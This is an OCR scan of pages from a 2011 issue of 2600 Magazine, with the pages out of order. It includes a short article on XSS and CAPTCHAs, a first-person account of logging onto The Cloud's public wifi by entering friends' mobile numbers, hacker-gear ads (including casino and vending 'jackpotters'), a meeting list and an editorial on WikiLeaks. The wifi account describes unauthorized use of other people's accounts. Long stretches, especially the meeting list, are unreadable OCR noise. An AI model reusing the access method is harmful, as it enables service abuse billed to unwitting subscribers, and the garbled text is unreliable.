woo.freifunk.nellWireless; Communif)'_Weekeod_20I I
June 18
Maker Faire NC 2011
North Carolina State Fairflrounds
Raleigh. NC
makerfairenc.com
Listed here are some upcoming of mtereSt to Hacker 00nferen.ees
generally ·cost under $100 and ' are open co everyone. Higher prices may apply 10 the
more elaborate events such as outdoor camps. [f you know of a conference or event
that should be known to the hacker community, email usatbappenings@2600.com
or by snail mail at Hacker Happenings , PO Box 99, Middle Island, NY 11953 USA .
We only list events that have a finn date and location, aren't ridiculously expensive, are open
to everyone, and welcome Ihe hacker community.
Spring 2011
_......-::...
References
• The Cloud: www. thecl ova, ne c
A(cDonal£u:www.mCdonalds. co.uk
2600 Magazine
be skewed leners, but it does have to be annoying.
All il is is a simple Turing test, something that's
easy for bumans to answer but hard/impossible for
computers, which means you'll have to test your
users before they can continue if it's important to
you to thwart 0015. And finally, IU all your XSS
holes! XSS gets dismissed as a lowly not-very-
harmful vulnerability because"so what if someone
pops up an alert box?" Hopefully, this article will
show you that it 's a bit more dangerous than that.
"' . , .... .....-, ...
was easy to fitter the list of numbeis mto friends
who had business pbones or did a lot of business
traveling. It was now simply a matter of copying
and pasting each mobile "umber (thanks iOS 3)
into The Cloud's login screen to see if they were
accepted. Withmuch amazement, on the third such
entry, I succeeded in being accepted by the router!
II was then a matter of navigating to a web page
(Google in this case - sorry!) to show I was really
connected,
In conclusion, it is clear that The Cloud has a
vulnerability in their network which could allow
unauthorized access to their services by jumping
onto someone else's account. Once accessed.
it could allow a malicious user to tether up their
mobile pbone to a laptop and abuse this access
(multiple PiraleBaytorrents'i), As for your friends'
phones, J believe they would not necessarily be
charged any extra as The Cloud offers unlimited
downloads on its monthly subscription. However,
they might be cut off due to your dubious online
activities under their name!
whenit gets executed, and you'll get anemail when
your new account is created. [fyou're creative, the
possibilities are endless.
There are two ways to protect your websites
against automated web bots and crazy XSS
attacks. First, the only way to defeat bets is to
include some sort of CAPTCHA (those annoying
images with skewed letters you need to retype) .
Make sure it actually works - I've seen forms with
CAPTCHAs \hat still work fine if you ignore the
CAPTCHAfield. YourCAPTCHAdoesn't have to
The following article relates 10 a very
hack of Internet service provider The Cloud's
public will network. Please, please don't do
anything that would get you into trouble such as
accessing their wifi routers without permission;
this article is written only to Ragup the potentially
weak vulnerabilityof their login process.
Some background first: The Cloud sells itself
as one of Europe's biggest public wifi providers,
wbich you can sign up for on a monthly contract,
or on a pay-as-you-go policy. Whencoonecied, it
allows a subscriber unlimitedInternet access when
their smart phone is used within the range of an
establishment such as a restaurant or cafe.
In my case, the local McDonald's was where [
found myaelfbored and chomping 00 a Big Mac. I
fired up my iPhone's Safari browser, and the only
wifi access in the area was given as "The Cloud."
As expected, this automaticallynavigatedme to the
sign-in window for accessing The Cloud services.
The "login" had automatically pUI my phone down
as being on the Vodafone network (correct), though
to my surprise the only security/passwordrequired
was my mobile phone number!
JUSI 10 check all was well, I inserted my own
mobile number and this was quickly rejected
as I am nOI a member of The Cloud. However,
this did gel mc lhinking.... I quickly opened my
Page 60
Marketplace
Page 62 ------------------- -------------------Page63
For Sale
DANGEROUSPROTOTYPFS.COM - we make open
source hardware. Hack your world with the Bus Pirate,
USB Infrared Toy, Logic Sniffer, and more . The Bus Pirate
($30) is a universal bus interface thai talks 10 electronics
from a PC serial terminal, eliminating a ton of early
prototyping effon wben working with new or unknown
chips. USB Infrared Toy ($20) is a PC remote control
receiver/transmiuer: view infrared signals on a logic
analyzer, capture and replay infrared signals, and play TV
POWER codes. The Open Worlcbench Logic Sniffer ($50)
is a 100MHz logic analyzer with USB interface. All prices
include worldwide shipping! Check out all our open source
projects ar www.DangerousPrototypes.com.
AT OWLDOMAIN.COM we take pride in helping our
users develop and deploy their newest ideas . Need a VPS?
How about a dedicated server? Maybe shared hosting? We
have all of those and more! We realize the economy is in
the gutter right now, Let us be the rope to help you get back
on the top with packages starting as low as $4 .95 USD
a month . Did we mention unlimited bandwidth and data
space with our shared hosting? OwlDomain completely
suppons 26()()! So much in fact that we have already cut
our prices by over 26%!
J!NX-HACKER CLOTHING/GEAR. Tired of being
naked? JINX.com has 300+ T's, sweatshirts, stickers, and
hats for those rare times that you need to leave your bouse .
We've got swag for everyone, from the budding nOObletto
the vintage geek, So take a five minute break from surfing
prOn and check out hnp :/lwwwJ1N)( .com. Uber-Secret-
Special-Mega Promo: Use ''26()()v28no l '' and get 10% off
of your order.
CLUB MATE now available in the United Slates. The
caffeinated German beverage is a huge hit at any hacker
gathering. Available at $45 per 12 pack of half liter bollles.
Bulk discounts for hacker spaces are quite significant.
Write 10 conlact@c1ub-mate.us or order directly from
store .2600 .com.
ANONYMOUS VPN. Send $5 .00 per month to IP
Anonymous, PO Box 83, Port Hadlock, WA98339. Include
a very unique user name, password and the date you would
like service to Sian. Simply point your PPTP client at
ipanonymous.dontexist.net . IPSec account also availahle
for an additional $5 .00 setup fee . Include an email address
so we can send your configuration. For technical assistance,
email ipanonymous@yahoo.com or call 614-285-4574.
TOS : The exploitation of minors will not be tolerated.
GAMBLING MACHINE JACKPOTTERS, portable
magnetic stripe readers & writers, RFJD reader writers,
lockpicks, vending machine jackpotters, concealable
blackjack card counting computers, computer devices,
odometer programmers, and much more. To purchase, visit
www.hackershomepage.com.
CAYT'N CRUNCH WlDSTLFS. Only a few left. THIS
IS THE ORlG1NAL WHISTLE from Capt'n Crunch cereal
box . Brand new, unused, mint condition! Join the elite few
who own this treasure! Once the remaining few are sold,
that's it • there will never, ever, be another one offered
again . Key chain hole for easy insertion on your key ring.
Identify yourself at meetings, etc . as a 26()() member by
dangling your key chain and saying nothing. Cover one hole
and produce exactly 2600 hz. to beep-off a long distance
call so you can then Multi Freq, another if your telephone
office uses in-channel long distance equipment. Cover the
other hole and you get another frequency. Use both holes
to call your dog, dolphin. concubine, or hamster. Also,
ideal for telephone remote control of your own electronic
remote devices. Price includes mailing. $59 .95. Not only
a rare collector's item but a VERY USEFUL and unique
device which is easy to carry with you at all times; nobody
wiU ever know, except you, how it is used for remote
control! Casblmoney order only. Mail [0: WHISTLE,
P.O. Box 410802 (ST),CC, Missouri 63141.
TV-B-GONE. Tum off TVs in public places! Airports,
restaurants, bars. anywhere there 's a TV. Turning offTVs
is fun! See why backers and jammers allover the planet
love TV-B-Gone. Don't be fooled by inferior fakes. Only
the genuine TV-B-Gone remote controls can rum off almost
any TV in the world! Only the genuine TV-B-Gone remote
control has Stealth Mode and Instant Reactivation Feature!
Only the genuine TV-B-Gone remote control has the power
to get TVs at long range! Only the genuine TV-B-Gone
remote control is made by people who are treated well and
paid well. If it doesn't say Cornfield Electronics on it, it is
not the real deal. Also available as an open source kit, as
well as the super-popular original keycbain. The kit turns
offTVs at 40 yards! And for professionals, the TV-B-Gone
Pro turns off TVs up to 100 yards away! 26()() readers get
the keychains for 10% discount by using coupon code:
2600REAL. www.TVBGone.com
Help Wanted
ATTN 2600 ELITE! In early stages of project to
develop an international social network for information
exchange. Just a few topics include : cryptography/secure
communications, sovereignty, business and tax law
manipulations, quantum causality, algorithmic structures,
network traffic analysis, social engineering, and much
more. Are you looking to apply your technical skill set to
a multitude of world changing projects, or need 10 barter
infonnation with professionals [0 expand your reference
base? We need your belp to see this project succeed. For
details write: Joseph Hayden #7410 I , L.CF., PO Box 2,
Lansing, KS 66043.
NO COMPROMISE PROVIDER of open architecture-
based network privacy & security services is actively
searching for exceptional technologists (of all hat colors)
with extensive experience in network topology/design,
VPN architectures, and general "nix sysadmin - we
recently survived a massive federal effort to shut us down
via extralegal harassment & imprisonment of our founding
emon political grounds; company is now bouncing back
& expanding our service offerings (telecom included).
Must have strong loyalty to principles of free expression,
anti-censorship, genuine cultural diversity. Tribal-based
management philosophy - strong financial performance,
strong community involvement. Details , compensation
info, & longtime community credentials available via:
wrinko@hushmail.com. Namaste.
2600Magazine
Wanted
SEEKING TELEPHONE EXCHANGE LOCATIONS.
I want your lists of telephone exchanges, their locations,
and the numbers and area they serve . Extra points for
third-world countries. I am willing to pay with dollars
or trade for similar data. Contact: BitRobher@sbady.lel
(pgp key fingerprint: 8BA9 5A91 2407 IDA6 6AC2 P9C2
04A8 C3Dl 073D 9665).
PAYPHONE PICTURES & NUMBERS WANTEDfrom
around the world . Please send in pictures of paypbones
in unusual , famous, or interesting places, along with the
payphone's callable telephone number when: possible.
Please send all to sfoswald+payphone@gmail.com, with
as much information as possible. All contributions will be
added to the increasing collection of callable international
payphones. Miscellaneous payphone information is also
welcome. The site is called PayPhone Box and can be found
via
Services
PLEASE HIRE ME! I am a hacker in desperate need to
break into the IT and infosec industry. I don 't have certs,
but loads and loads of experience. Resume and references
available upon request. Sysadmin, VoIP admin, DBA, tech
writing, ANYTHING please . Infoinject@gmail.com or
866-50 I-CHEN x007 . Thank you in advance.
JEAH.NET UNIX SHELLS & HOSTING. How about
Quad 2.66GHZ processors, 9GB of RAM, and 25x the
storage? JEAH.NEf is #1 for fast, stable, and secure
UNIX shell accounts. Use hundreds of IRC vhost domains
and access all shell programs and compilers. JEAH also
features rock-solid UNIX web hosting. 26()() readers' setup
fees are always waived. We support 26()(), because we
read too! Don't forget our free private WHOIS registration
service, with domain purchase, at FYNE.COM.
SUSPECTED OR ACCUSED OF INTERNET-
RELATED CRIMINAL OFFENSFS? Consult with a
lawyer experienced in defending human beings facing
computer-related accusations in California and federal
courts, I am an aggressive Constitutional and criminal
defense lawyer with experience representing persons
accused of unauthorized access (so-called computer
hacking), misappropriation of trade secrets, and other
cybercrimes. I am a semantic warrior committed 10 the
liberation of information (after all , information wants to be
free and so do we), and 1am willing to contribute pro bono
representation for whistleblowers and accused backers
acting in the public interest. Past clients include Kevin
Mitnick (miJlion-dollar-bail case in California Superior
Court dismissed), Roben LyIl1e of The Deceptive Duo
(patriotic hacktivist who exposed elementary vulnerabilities
in the United Slates information infrastructure) , and others
who will remain anonymous. Also, given thaI the worlds
of the hacker and the cannabis aficionado have often
intersected historically, please note I also specialize in
defending medical marijuana and cannabis cultivation
cases . Pleaseconlact me, Omar Figueroa, at
or (707) 829-m15, al omar@stanfordalurnni.org,or a[ Law
Offices of Omar Figueroa, 7770 Healdsburg Ave. , Ste , A,
Sebastopol, CA 95472. Complimentary case consultation ,
Stand up for your rights: "I respectfully invoke all of my
Constitutional rights, officer. I do not consent to any search
or seizure, I choose to remain silent, and I want to speak to
a lawyer." Remember your game theory and the Prisoner's
Dilemma: nobody talks, everybody walks.
INTELLIGENT HACKERS UNIXSHELL. ReverseNet
is owned and operated by Intelligent Hackers. We believe
every user has the right 10 online security and privacy. In
todoy's hostile anti-hacker atmosphere, intelligent hackers
Spring 2011
_-..-
require the need for a secure place to work, compile, an,
explore without Big Brother looking over their shoulder.
Hosted in Chicago with Filtered DoS Protection. Multiple
Dual Core FreeBSD servers. Affordable pricing from
$5/month, with a money back guarantee. Lifetime 26%
discount for 26()() readers . Coupon Code: Save2600.
hnp:/lwww.reverse.net!
Announcements
EXPLORE. COLLEcr. CONNEcr. Various FYI :
public intelligence blog at phibetaiota.net, re-configure.
org, true-cost.re-configure.org, webtxtmsg.corn (make your
web content accessible through text-messaging). For those
in NYC, get subway updates by sending "t xtnyc" (space)
"subup" to 368-638 (OOTNET). This is pan of my txtnyc
mobile info service experiment. For more.just send "txmyc"
to 368-638. Contact: mobiledemocracy@hushmail.com
WE LIVE IN AN INCREASING AGE OF
MISINFORMATION, fraud, and dysfunction. We
need more people exploring, collecting, and connecting
public Intelligence in the public Interest (Cryptome.
org, Wikileaks.org) . I work as the NYC Director for the
nonprofit Earth Intelligence Network. Our Online Public
Intelligence Journal (loaded with resources) can be found
at bnp :/lphibetaiota.net. We seek to identify dysfunction
and energize creative solutions by interconnecting and
harmonizing the 12 policy domains with the top 10 global
threats and 8 cballengers - hllp:/Iis.gdldOFOj Related
links : twiner.comlearthintelnet , youtube.com/earthintelnet,
www.earth-intelligeoce.net.true-<:ost.re-<:onfigure.org,
smart-cityre-configure.org. Free books: Intelligence for
Eanh - bttp:/lis.gdlb4519 & Collective Intelligence -
bttp :/ltrlmlj09S Contact earthintelnet@gmail.com.
OFF THE HOOK is the weekly one hour hacker radio
sbow presented Wednesday nights at 7:00 pm ET on WBAJ
99.5 FM in New YorlcCity. You can also tune in over the net
at www2600.comlofftbebook or on shortwave in NOM and
Central America at 5110khz. Archives of all shows dating
back to 1988 can be found at the 26()() site in mp3 format!
Sbows from 1988-20I0 are now available in DVD-R high
fidelity audio for only $ lOa year or $150 for a lifetime
subscription. Send check or money order to 26()(). PO Box
752, Middle Island, NY 11953 USA or order through our
online store at http://store.2600 .com. Your feedback on the
program is always welcome at oth@2600.com.
ONLY SUBSCRIBERS CAN ADVERTISE IN 2600!
Don't even think about trying 10 take out an ad unless you
subscribe! All ads are freeand there is no amount of money
we will accept for a non-subscriber ad. We hope that's clear.
Of course, we reserve the right to pass judgment on your ad
and not print it if it's amazingly stupid or has nothing at all
to do with the hacker world . We make no guarantee as to the
honesty, righteousness, sanity, etc . of the people advertising
here. Contact them at your peril . All submissions are for
ONE ISSUE ONLY! If you want to run your ad more than
once you must resubmit it each time. Don't expect us to run
more than one ad for you in a single issue either. Include
your address labeVenvelope or a photocopy SO we know
you're a subscriber. Send your ad to 26()() Marketplace,
PO Box 99, Middle Island, NY 11953. You can also email
your ads to subs@2600.com. Be sure 10 include your
subscriber coding (those numbers on the top of your mailing
label) for verification.
Deadline for Summer issue: 5125/11.
• • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • • •
Shout Outs: Oda Kvaal-Tanguay, Stig, Joachim. Jessica. Chloe. Basil, David House.
Maxim, Andreas Rudin, Revamp-It, Bi.t:gitta Jonsdottir
Forum Admins
Bunni3bum, dot.ret
IRC Admins
beave, koz , rOd3nt
YEARLY SUBSCRIPTIONS:
u.s. and Canada - $24 individual .
$50 corporate (C,S. Funds)
Overseas- $34 indi vidual . $65corporate
Back issues available for 1984-1986 at $10
per year. 1988-2000 at $2.50 per issue. 2001-
2010 at $6.15 per issue. (1987 only available
in full back issue sets.) Subject to availability.
Shipping added to overseas orders.
4IiiiI. Infrastructure
f1yko
.... Network Operations
___ css, phiber
.& Broadcast Coordinator
"""Juintz
Cover
Dabu Ch'wald
Office Manager
Tampruf
Associate Editor
Bob Hardy
Layout and Design
Skrarn
Editor-] o-Chief
Emmanuel Goldstein
POSTMASTER:
Send address changes to: 2600
P.O. Box752 Middle Island.
NY 11953-0752.
RIP: Ed DcFelippis
261JO is written by members of the global hacker community. You can be 8 part or this
by sending your submissions to artIcles@2600..CQm or the postal address below.
261JO (/SSN 0749·3851. USPS # 003·176):
Spring 20] I . volume 28 Issue J. is
published quarterly by 2(j()() Enterprises IIIC.,
2 Flowerfield. St. James. NY JJ780.
Periodical postage rates paid at
St. James. NY and additional mailing offices.
Inspirational Music: Death Cab for Curi e, Solomon Burke. Cheryl Wheeler. DJ Cam,
Sugar Ray. Suzanne Ciani. The Killers . The Fasl
-

We know what a lot of you have been up to.
Don't worry. it's cool.1be world needs new hackers, and creating them in your own home is a
very ingenious plan indeed. BUI have you thought about what these future innovators are going to

WeU.worry no more. The folk.s at the 2600 clothing subsidiary have devised a brandnewscheme
to entice youngsters into the world of hacking at a far younger age than has ever been attempted.
So here's what we're offering: two-color printing of the famous blue 00... on the front of 100% cotton black
shirts for the wee ones. in the following sizes: 12months.TI. 3T.4T.5161, and Youth Small
The prier: is $15. You ClUJ order one Wdrly aJ or by writing to tne subscription
address on the mIt page.
LEITERS ANDARTlCLE
SUBSCRIY110N CORRESPONDENCE: SUBMISSIONS:
2600 Subscription Dept ., P.O. BOll 752, 2(j()() Editorial Dept., p.o. Box 99.
Middle Island, NY 11953-0752 USA Middle Island. NY 11953-0099 USA
(subs@26OO.com) (lencrs@26OO.com.articles@2600.com)
260() OfficelFax Line; +16317512600
Copyright 20 II; 2600 Enterprises Inc,
Page64------------------ 2600Magazine Spring 2011
---
-------------------Page65
2600 Magatine
All __lib pIOOl .. IN _
__
nol<4, ...., JlaI1 .1 S p* _ .....
11> ....... --.'",_..-,._
........ ..-.clBD_:IiOQ...,.

Pl ncn"""""'B::d...I03 R
7pm
eoa..bus: Ea'l;.an To_o C'er1Cn". 1
the foo-J courl -=n;Mi ' fnJmtbc Indoor
roua1ain .1 pm.
DI,ytQn:Marien,. P\a1.lJ1 "er. 2D. 8991
Klptt'lrillj;r 0,_behind UW: lb)1'JA M.lII
ofl SR-741.
0Uah....

oomn f:JSW IWIb 5t and Pl'1
ar.a-
_ : Bacbpoa: c.r•. 115 NW
"I'oAwC' . r, pm

_ -'Urcad. 31110111
1\1111_ 51.6 .-
IluTbburl: Po""" Bre.l•.tW
Un1<on Orj:ooi. Rd. 6 pm
PloII"'pbiil, 30IJl51Surion.
1IOUlhC'''t (4D,j court nearmini post
of(I«',
PlI.bburJlh: Panc-ra Bn:: adoa BllId
of the " iii.. nnar PI. and eMU
eampuso. 7 pm
...... C..t,.: i. .... HUB 'bow lh<
SU\hipilei onlhl! ft'nfl Stmccampw.
PuIt'r1oRId
5-.J_: ..,... wAnooioal by
Buc'dn't!QIl frnlft(.Q' ,
1nJUIoAI.., The OfllonIri>Ill'llb.
7:30 po
_C.....
NaIIl_Mall ialllo
""11_. s.... and Cu\· fil.A.
Swtft DoIoo<a
FaIk Empift!:MoIll. by Bu'B'L"f
Kinl ·
Tm_
'KalIn.: 'Wd.tTown M.a.l1 rOOt.l
court , 6 pm
MflUphb: R.pulll i. Cotf... 1!n4
Walnul OJ'O"f': Rd. 6 pm
N IIt. l.tj ·, Matht '" c.r.. 1912
B-.I , . 6 pm
1'tIaII
...eo:SpUr _ ear•.29QS
Fnob 51.1_ """" ""'"" fromIb<
1.-. 7 pm
_ 1l'IIdTUrtry .2A70\l/abuI Hill
L.onc._ p>rcII...,lIlo--..
7:30pm
H_ : Nitt.a\ E>.......... ,.,
in dw GIUeri. Mall. 6 pm
S. Aacoa": HuIUC!l BUI'JU. jAj6
Wal, emRd. 7 pn
.......-
B.... Ja....: Buroel'l8oc*!Io II
S. and Cbtny Sion <he ".,.",.( ft"",
ot ,tlcwC'.
YlrJlulI
Art1.qr.Ixa: b« Di,1Jict orCoIWTlbil)
Squil'l'i StWrnt Crnkr 1.1
Yi'l!nltT«b.lIK N. M>lnSt. 7 pm
a.riaIIePU...: Pl nrra
<he Ihmcl<J Rood5hoI>Pioi Ceol<t.
6:JO1"".
""",- __lobIIlood
ooun.8pm
..........
-.WbIlinp>n SI.aIoCon_
em....:!nd............. lido. 8 pm
Spobno: Thn50"" ", 5lalion . 931 N
N...... (NonIIS.......l·
w_.
Pobd"", FllirTnd< CofT.. l lroon.
418 SIiIlcS. ,
TUiIk Mi ll in!lit lock of
the rlXld court on the 2,..". ftoot , 6 pm G___
Allaate: LcOOll Mall rood court . 7 pm
lIaWlllI
8110: Prim KuhioPI.u.a r<n:t ,:'-'un.
Id....
Bal.-: BS U SIu&nl UnioonUUUdl"l.
upttaln from the mainC:nlrara.
Pa,phono>; (;,)8) )42·9700.
.......'..:CDIkrc Marlul.rooS
""" 51.
1- 010:-.0: Golden "",*.:m, N.
Lixoll\ 6 pm
.-
E'.nnfUir: B.amo..t NobIc Q/c II
6:A S Ri..rr R4..
t'1. W.,,_: Glcnbl'o::Jll.....aJI food COW'
in frgm of Sbun:l'J. 6 pm
Ind_puIls: Mo'l", Coil.. House.
mWMictlir;anSI.
10••
Ames: Memorial Union food
lXIlJrt 8t1hc IowaSllIlC Unl'¥eRil.1.
110_", O>-L.ob. 1033 ES3nl 5t.
IUin('&' 1
Kon... City (o-tand 1'wII): OIll1lrl
It NobW.:.ate. (We hit M.aU.
Rrvl:'n.ldc PaiL. 114.\
Ri nintAw.

o.te-c Z'or:zCoIf.. Houw
_ .. 1!21000tS••6pm
Mob.
_d: 1oI1i.. M.allby"" _ _
,''' loud ..... dwo.6 pm
M>rJIand
8.ames &: NobIt: W ( I I \he
InnerHMbrJt.
M-eb....ns
8oItoo : Strlll.\on Student Ctntcf
(BuildlnltW20) d MIT in me 211d ftoor
loun,cc an:a, ., pm
Morlbon""" Solomon Pond Mill
'OlllI..,..,.6pm
N........"""': The Y.lIowSolI .. :z,o
Ma.inSt.6J111
M-.o
... Arbor. in 1lx-
01 S Uniwm.il). 7 pn
-
I. a 'lOO I'l W__.
M_
so. r.-Jo: "n:J\1l.cadot _ Spo«.
2AQO.$ol.DJCffCDODA--e.
Spiallllldd' U__......u,;"
cotTcc1.hop. :1300 5 GlelUtoneAile.,
one black SOIollh of Bm1r:6cldMall.
' :JQpm
""'n.....
H._HIli "",I.s. OX .. Lund)'
U nll'r.
I'l._
010>0lio: 111. _/0l.Il1 __
_ ................. . IOOlIIIlIllIDod&c,
7pm
-
1M " _ Sl>ctIoct>
CalI J8t(l 7 pm
R " __S'55
S. YllzjniaSl.
--
,,-..q......., Qonlab , _.,.,
"'..... r5poa:. 1I112nd S. NW.6 pm
_ YorIl
NowYorIl: OIlpuupe..-.1JI
Ih. !oI:lly. IS3 ES)rd 5••bntwD:n
l<';nlllOo" l id.
II'Itc'rtock Rochella, II U E
$1,1 :)0 pm
NClI1Ilc.roll..
CIwioar. I'Incnllll'Cld. 9321 /W
O. y I:tlllld(nrM UNC Owk1ttC')_
6,JOpm
_ : Rorol- - olq>.
Nt:rlll:aLANIIS
Ulndn: In front of the th.lrJCI Ki", II
U"""" ConualSUolJoo. 71""
h,£WZ£AUND
"_: I..onbo Ilar. uptWn .
WdIosIo)o 51.AudJaod e-.J.
S:30pm
ea-: J... Cofc.",","ol
Hi"" Soand W-bnitt 51, 6 .....
NOIlWAY
Odo: .s.tr,lraJTrain SUIli"" lI.he
"mo=rirlJ Jri..... arr.l in II.. m. jn
ball . 7 pm
TroIfl"lDr.The upper ,klut ut fil..
Cafe, Stnlll.lpta 1".6 pm
Thlnd_lm: Rick', Care In
Nctd",pu.6 pm
PEIIU
U ..... Barbiloni. (cJ, Apu liar ), "n
AkD ron:J.csj,. Mira."I&lITlo. at Ihc 1:'nd
ofTa-. 51.8 pm
SOI111t,U1UCA
J--.<_a".:
_ IOlllI""".8:30pm

_ : C<ntnl Sub.....
6cCGJd Soor. imide tht It ki l iO
lCIaJ'11tap'lilduktcQ at'lo1lc nViin hall .
S"Tl'ZERLAND
LaUAl'-: In fron1of ,he P-tacl)o
bc, idr the miio Ila1ion. 1pm

E_.: St.. D.vid's HOItl.
UNJTY.D STAn;:;
Ala......
Ae • ...: The ,.Ol1cm 1nunge: uptta in in
lhe Fay Union BuUdini. 7 pm
H••lPlnt: SUnlIW's Sub Vill.1un
l oniatl Lann.
,,-
_ Loll Cdf« H""....700
IOanhCallnl_. 6 pm.
Pr-.: MdhodCdfon. 31"' ...·' I..,..
Cm:tR4.
....-
ft. _ : S"",,",,", Coff«.7908
IloFn " ...8 pol
CaJUonIa
Lao......... Union 01
M.I.C)' a:Alameda.. Imide: mainCIdnlnCe
bybonk01pbo..... Poypl:onn.: (213)
... ; 613.
97\)1.91<6.
M..... Muoky 0uek.'79 AI..."...,
SI,D01""-
s..-""Roind Tolll. PIDoII
177 KS, .
So. DIoF: RegentS Plzu,,41SO
R............ R_.,70 .
..
(,m;';"). 5:30p:D
5-.".., <heal... <hetolLX
Li!nty II 4lh and ESml'ananllo,
6pm
......... B..... inaidcThc
o;.lric:1 sMppinr:oenta'(CIQl1\et 0'
I.......... andBInWICO). 7 pm
e-.IG
ua.ood: UII1IcI andNoble In"'"
D:M""Q' \IkM; Shepp!n. Cenler, 14:W1
W Col(u Ave,
C..-.
WIIwbury: Br-.. Mill M.a.l1
f1o:w tocaJooW1. pClll
Illobicl ol Col_bit

5 )010:-St (i n '-:nuton Row.onUx
....... rt)wJ. 7 pm
AIlCEIY11l'lA
B_AIRS: Ri ......,;I 2022 ..La
- r,..-
AIlSTlUA"
Cru: Cafen..hnccUc an
J.komlnlplm:.
1IR.u1L
Botlo HortllOlur.:Ilt'lcJO'J l1ar••
Aa' lJfcll3 . ht a, lhe payphone . 6 pm
CANADA
AI.......
CaIpry: EaI Clai.. Pdorkd loodO>WI
by lh< wI·S hot>\'OO. 6 pm
_bC_bi11
A' 51_Sr in Old loW.
in '-dnn.I_·,.11lU.-1"...

51. VilliSI1oppi' 1CmIrt.
r=..... by H/IIV.
_:OwnplaIn MIllI roodooun.
ne 7pm
--
SL........: tolemnri.al Unl.....iry
Center Food Cou rt (in fl'Onl 01the
llll!ty Qu<en).
Oa..rto
OftIn: Wood F..lehans e Plu.a. III
Albeit lIoor. 6:3Qpn'
ToruMo: Pro: nmcs Cafe.Collc-ZC'
ud Spolina.
WID<bor: Satal) ', . WJorolo'••
51E, 6 pm

M_: Bell 1<lnjIlliIbn_.lOOO.

DoauuIn lb: &J- j-.I ...... willi
-.
C111l'lA
u..aK...: P>OtI<C"""" In -.oI
Walk. """kDl Too, . 7 po
ClZCH RErUII U C
1'tqJn: l<gcndo pub. 6 pm
DENMAJIJ:
A..!lorI:PII' l'Mie', pool h,lI ,
AartU15: Inlhc fat oomer of the 058
calc in eherail ...ay swion.
:c. r. II......
_ : OlI. llnI<n. 7:30 pm
KIlGUND
.., by llle
Sali.fe Centre Cata"m\ the..-.:t from
""PIIKc 1'1«1. p", phonc: (Olm,
606ll'R7 pm
1....t.:"'J'hE Bn::wnyl ap Uwh.. 1
Tru:ad<tu SIloR:ioI ee.-
(nnarl'\<:Qd, U, C....... ). _ ......
6-301'"
tuai Pl.Ibon
LandonRd. 7:30pm
N....tcIL: Bc:nIcn. COllallUC' IU
OlopdSdd MIll . 6 pm
FlNUND
_, PonnJaIwnJ<li lOOol""""
(Vunrikalu '''1 .
fJlAIICt:
Canoes: P:alailo des Fnll.., ah &. de l
Cmge, la CloiKac ... <heInn lido,
un.: Gnrd-PIaoe (l'Iaon Owl.. de
GaulI<) In r_ ol llle Fum da Nord
--'.9pm
_Quil:t -....PIaoe do ..
1<JdlI"Jun- 8 pm
1..-IAI _ ol tlln _ - BIu<
Ikn' dooo:10 PIaoedc b llq>ubliquo,
8pm
_"""obc.,iOlkbylh<
tbr rol b=d amthe
Copitlolc_all. 7:30 po
GIIi1lCE
A_<MIidethc bool"IRI'C
PapbOtrriou<In die oamc.r of Palilolon
andSlwmari. 7pm
IREL4ND
Doblln: AI <he...,... boo1h 00
Widlow S4. leconb.
7pm
rT.\l.Y
M.O.u: I'i:::a::orz:a LcttIo in tronlof

Page 66------------------

You would have had to have been in a coma or a deep state of denial to not be aware of the massive changes that have been taking place this year in various parts of the world. Regimes have toppled and people everywhere have become empowered to speak their minds and express their dissatisfaction. Few among us would see this as a bad thing. Yet it is but one of the offshoots of last year's controversy of leaked cables and intelligence, viewed by many then as treasonous and worthy of the harshest possible penalty. Was WikiLeaks the sole cause of all of this global mayhem? Certainly not. The entire region has been a tinderbox for ages, and citizens learning the truth about their government was but one spark that helped to ignite the flame. WikiLeaks, in their actions, disseminated a good amount of this type of truth to people in countries everywhere. The ingredients for a tumultuous reaction were already in existence, albeit dormant from so many years of inattention. All it took was a little official confirmation. A June 2008 cable from the United States embassy in Tunis outlined the extensive corruption within the Tunisian government. The cable was released to the world in early December. Massive antigovernment demonstrations soon followed, leading to the toppling of the regime in January. The winds of change continued to blow throughout the region, overthrowing the 30-year reign of Hosni Mubarak in Egypt despite stubborn resistance from a leader who couldn't seem to grasp what was happening to his controlled environment. Then it was Libya's turn, where all hell broke loose. All told, no less than a dozen countries were affected by the unrest,

many making key changes in leadership and policy in reaction to the growing anger. The rest of the world watched, waited, and reacted. There were relatively few parts of the planet where these momentous events were not seen as a good thing overall. Finally, people had woken up and toppled oppressive dictatorships, hopefully instilling more free and open societies. The volatile reaction started with the;' revelation of that one little bit of honesty. No doubt its release would have been branded as an unacceptable risk to national security by the powers that be, just as virtually every leak last year was. The truth can certainly hurt. But the truth also has a way of setting people free. It's all about accountability, after all. When the lies are exposed - and they most always are exposed - will the leaders and regimes have ., enough public support to weather the storm? Or will these revelations be the straw that broke the camel's back? Whichever it turns out to be, blaming the messenger - or giving him all of the credit - is ignoring the plainly visible reality. We're familiar with this problem. The hacker world has long been all about exposing the truth in its various flavors. We're told to accept insecure systems, to not touch things we're told not to touch, to keep our knowledge and discoveries confined, and, above all, to just play the game and keep our mouths shut. Clearly, that doesn't work for most ofus. If something is broken or ifsecurity is nonexistent or insufficient, we tell the world. Learning is all about touching things that are off-limits, something many of us do for the first time as toddlers. There is no fun or joy in any of it if we can't share our discoveries and observations with everyone who will listen.
I

And, as for playing the game, a lot of hackers simply prefer to make their own games. This is the culture we have formed. Those who don't get it, those who fear the unknown, those who find themselves in power over systems that may not be nearly as robust as previously thought. .. they are the ones leading the charge to clamp down hard on anyone who would dare to step outside the norm. In far too many cases, they are the ones taken seriously in the mainstream. Hackers are viewed as the true threat to our way of life, rather than the poor programming and lack of concern for security and privacy that dominate. In an incredible example of this shortsightedness.Secretary of State Hillary Clinton, in addressing the momentous events in the world previously alluded to, managed to castigate hackers in the same breath as those who cut off Internet access and even torture opponents of oppressive regimes. It's clearly all just wordplay and a desperate attempt to have one's cake and eat it too. After all, if you view hackers as a positive force in getting the truth out in one situation, how can you turn around and call them a threat back home? If leaks about corruption lead to a positive change in a distant land, how can we be so quick to assume such revelations will only cause harm within our own borders? Somehow, those who wish to stay in control no matter what must figure out a way to profit from the reactions while condemning the actions that provoked them. It's a tricky game, to say the least. As always, we face the danger of falling into the traps that are set. We're all quite familiar with the inaccurate definitions of hackers that the mass media helps to spread. We must continue to do everything possible to correct this perception and reach people on our own terms. Lately (and as seen in the Clinton comments), the attempt to tie hacking with the cutting off of Internet access has gained steam. It's relatively easy to disrupt the Internet connection of an organization like WikiLeaks or even a large corporation like MasterCard. And there is no shortage of people willing to say they did this in the name of hackers, even though it doesn't take much in the way of skill to do such a 